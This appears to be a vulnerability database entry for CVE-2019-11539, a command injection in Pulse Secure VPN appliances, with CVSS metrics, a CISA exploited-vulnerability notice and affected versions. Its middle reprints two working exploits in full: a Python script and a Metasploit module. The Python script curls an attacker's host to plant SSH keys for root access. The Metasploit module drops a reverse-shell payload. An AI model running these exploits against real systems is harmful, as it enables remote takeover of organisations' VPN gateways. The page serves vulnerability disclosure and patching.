CVE-2019-11539 : Detail

Score: 7.2 / High (CVSS V3)
Weakness: OS Command Injection (OWASP A03-Injection)
EPSS: 96.44%
Attack vector: Network
Published: 2019-04-26 01h39 +00:00
Last updated: 2025-02-03 15h41 +00:00

CVE Description

In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.

CVE Information

Related Weaknesses

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Metrics

CVSS V3.1: 7.2 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

CVSS V3.0: 8 HIGH
Vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers).

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

High

The attacker is authorized with (i.e. requires) privileges that provide significant (e.g. administrative) control over the vulnerable component that could affect component-wide settings and files.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Changed

An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

CVSS V3.0: 8 HIGH
Vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVSS V2: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name: Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Required action: Apply updates per vendor instructions.
Known to be used in ransomware campaigns: Known
Added: 2021-11-02 23h00 +00:00
Action due: 2022-05-02 22h00 +00:00

Important information
This CVE is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, which means CISA has evidence that it is being actively exploited. Remediation of this CVE should be prioritized: apply the vendor's fixed releases to affected appliances to protect them against ongoing attacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with those of all other CVEs.

Exploit information

Exploit Database EDB-ID: 47354

Publication date: 2019-09-05 22h00 +00:00
Author: Justin Wagner
EDB Verified: No

#!/usr/bin/python # # Exploit Title: Pulse Secure Post-Auth Remote Code Execution # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 09/05/2019 # Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: linux # CVE : CVE-2019-11539 # # Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) # # Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN # Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. # You will need your own configuration and authorized_keys files. # # Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 # Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html # # Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. # We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. # # Imports import requests import urllib from bs4 import BeautifulSoup # Host information host = '' # Host to exploit login_url = '/dana-na/auth/url_admin/login.cgi' # Login page CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code # Login Credentials user = 'admin' # Default Username password = 'password' # Default Password # Necessary for Curl downloadHost = '' # IP or FQDN for host running webserver port = '' # Port where web service is running. Needs to be a string, hence the quotes. 
# Proxy Configuration # Uncomment if you need to use a proxy or for debugging requests proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } # Headers for requests headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded', } # Cookies to send with request cookies = { 'lastRealm':'Admin%20Users', 'DSSIGNIN':'url_admin', 'DSSignInURL':'/admin/', 'DSPERSISTMSG':'', } # Data for post request loginData = { 'tz_offset': 0, 'username': user, 'password': password, 'realm': 'Admin Users', 'btnSubmit': 'Sign In', } s = requests.Session() # Sets up the session s.proxies = proxies # Sets up the proxies # Disable Warnings from requests library requests.packages.urllib3.disable_warnings() # Administrator Login logic # Probably wouldn't have figured this out without help from @buffaloverflow def adminLogin(): global xsAuth global _headers # Send the intial request r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) print('[#] Logging in...') # Self Explanatory r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request print('[#] Sent Login Request...') # Login Logic if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer r = s.get(referer, verify=False) # Sends a get request soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr print('[#] Grabbing xsauth...') xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets 
the cross site auth token print('[!] Got xsauth: ' + xsAuth) # Self Explanatory data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page _headers = headers # Sets the headers _headers.update({'referer':referer}) # Updates the headers r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request print('[+] Logged in!') # Self Explanatory # Command injection logic def cmdInject(command): r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) if r.status_code == 200: soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token payload = { 'a':'td', 'chkInternal':'On', 'optIFInternal':'int0', 'pmisc':'on', 'filter':'', 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, 'toggle':'Start+Sniffing', 'xsauth':xsAuth } # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} # print('[+] Sending Command injection: %s' %command) # Self Explanatory. 
Useful for seeing what commands are run # Sends the get request to overwrite the template r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) # Sends the get request to execute the code r = s.get('https://' + host + CommandExecURL, verify=False) # Main logic if __name__ == '__main__': adminLogin() try: print('[!] Starting Exploit') print('[*] Opening Firewall port...') cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port print('[*] Downloading Necessary Files....') cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys print('[*] Backing up Files...') cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys print('[*] Overwriting Old Files...') cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys print('[*] Restarting SSHD...') cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP print('[!] Done Exploiting the system.') print('[!] Please use the following command:') print('[!] ssh -p6667 root@%s') %(host) except Exception as e: raise
Exploit Database EDB-ID: 47700

Publication date: 2019-11-19 23h00 +00:00
Author: Metasploit
EDB Verified: Yes

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Pulse Secure VPN Arbitrary Command Execution', 'Description' => %q{ This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF. }, 'Author' => [ 'Orange Tsai', # Discovery (@orange_8361) 'Meh Chang', # Discovery (@mehqq_) 'wvu' # Module ], 'References' => [ ['CVE', '2019-11539'], ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'], ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'], ['URL', 'https://hackerone.com/reports/591295'] ], 'DisclosureDate' => '2019-04-24', # Public disclosure 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'BadChars' => %Q(&*(){}[]`;|?\n~<>"'), 'Encoder' => 'generic/none' # Force manual badchar analysis }, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'} ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::SSL' => 
true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] } )) register_options([ OptString.new('SID', [true, 'Valid admin session ID']) ]) end def post_auth? true end def exploit get_csrf_token print_status("Executing #{target.name} target") case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager( flavor: :curl, noconcat: true ) end end def get_csrf_token @cookie = "DSID=#{datastore['SID']}" print_good("Setting session cookie: #{@cookie}") print_status('Obtaining CSRF token') res = send_request_cgi( 'method' => 'GET', 'uri' => diag_cgi, 'cookie' => @cookie ) unless res && res.code == 200 && (@csrf_token = parse_csrf_token(res.body)) fail_with(Failure::NoAccess, 'Session cookie expired or invalid') end print_good("CSRF token: #{@csrf_token}") end def parse_csrf_token(body) body.to_s.scan(/xsauth=([[:xdigit:]]+)/).flatten.first end def execute_command(cmd, _opts = {}) # Prepend absolute path to curl(1), since it's not in $PATH cmd.prepend('/home/bin/') if cmd.start_with?('curl') # Bypass application whitelisting with permitted env(1) cmd.prepend('env ') vprint_status("Executing command: #{cmd}") print_status("Yeeting exploit at #{full_uri(diag_cgi)}") res = send_request_cgi( 'method' => 'GET', 'uri' => diag_cgi, 'cookie' => @cookie, 'vars_get' => { 'a' => 'td', # tcpdump 'options' => sploit(cmd), 'xsauth' => @csrf_token, 'toggle' => 'Start Sniffing' } ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Could not yeet exploit') end print_status("Triggering payload at #{full_uri(setcookie_cgi)}") res = send_request_cgi({ 'method' => 'GET', 'uri' => setcookie_cgi }, 3.1337) # 200 response code, yet 500 error in body unless res && res.code == 200 && !res.body.include?('500 Internal Error') print_warning('Payload execution may have failed') return end 
print_good('Payload execution successful') if datastore['PAYLOAD'] == 'cmd/unix/generic' print_line(res.body.sub(/\s*<html>.*/m, '')) end end def sploit(cmd) %(-r$x="#{cmd}",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <) end def diag_cgi '/dana-admin/diag/diag.cgi' end def setcookie_cgi '/dana-na/auth/setcookie.cgi' end end

Products Mentioned

Configuration 0

Ivanti>>Connect_secure >> Version 8.1

Ivanti>>Connect_secure >> Version 8.2

Ivanti>>Connect_secure >> Version 8.3

Pulsesecure>>Pulse_connect_secure >> Version 8.1r1.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r1.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r1.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r2.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r3.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r3.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r4.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r4.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r5.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r5.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2r6.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r7.0

Pulsesecure>>Pulse_connect_secure >> Version 8.2r7.1

Pulsesecure>>Pulse_connect_secure >> Version 8.2rx

Pulsesecure>>Pulse_connect_secure >> Version 8.3rx

Pulsesecure>>Pulse_connect_secure >> Version 9.0r1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r2

Pulsesecure>>Pulse_connect_secure >> Version 9.0r2.1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3.1

Pulsesecure>>Pulse_connect_secure >> Version 9.0r3.2

Pulsesecure>>Pulse_connect_secure >> Version 9.0rx

Pulsesecure>>Pulse_policy_secure >> Version 5.1r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r1.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r2.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r3.2

Pulsesecure>>Pulse_policy_secure >> Version 5.1r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r9.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r10.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r11.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r12.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r12.1

Pulsesecure>>Pulse_policy_secure >> Version 5.1r13.0

Pulsesecure>>Pulse_policy_secure >> Version 5.1r14.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r3.2

Pulsesecure>>Pulse_policy_secure >> Version 5.2r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r7.1

Pulsesecure>>Pulse_policy_secure >> Version 5.2r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r9.1

Pulsesecure>>Pulse_policy_secure >> Version 5.2r10.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.2rx

Pulsesecure>>Pulse_policy_secure >> Version 5.3r1.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r1.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r2.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r3.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r3.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r4.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r4.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r5.2

Pulsesecure>>Pulse_policy_secure >> Version 5.3r6.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r7.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.1

Pulsesecure>>Pulse_policy_secure >> Version 5.3r8.2

Pulsesecure>>Pulse_policy_secure >> Version 5.3r9.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r10.

Pulsesecure>>Pulse_policy_secure >> Version 5.3r11.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3r12.0

Pulsesecure>>Pulse_policy_secure >> Version 5.3rx

Pulsesecure>>Pulse_policy_secure >> Version 5.4r1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r2

Pulsesecure>>Pulse_policy_secure >> Version 5.4r2.1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r3

Pulsesecure>>Pulse_policy_secure >> Version 5.4r4

Pulsesecure>>Pulse_policy_secure >> Version 5.4r5

Pulsesecure>>Pulse_policy_secure >> Version 5.4r5.2

Pulsesecure>>Pulse_policy_secure >> Version 5.4r6

Pulsesecure>>Pulse_policy_secure >> Version 5.4r6.1

Pulsesecure>>Pulse_policy_secure >> Version 5.4r7

Pulsesecure>>Pulse_policy_secure >> Version 5.4rx

Pulsesecure>>Pulse_policy_secure >> Version 9.0r1

Pulsesecure>>Pulse_policy_secure >> Version 9.0r2

Pulsesecure>>Pulse_policy_secure >> Version 9.0r2.1

Pulsesecure>>Pulse_policy_secure >> Version 9.0r3

Pulsesecure>>Pulse_policy_secure >> Version 9.0r3.1

Pulsesecure>>Pulse_policy_secure >> Version 9.0rx

References

http://www.securityfocus.com/bid/108073
Tags : vdb-entry, x_refsource_BID
https://www.kb.cert.org/vuls/id/927237
Tags : third-party-advisory, x_refsource_CERT-VN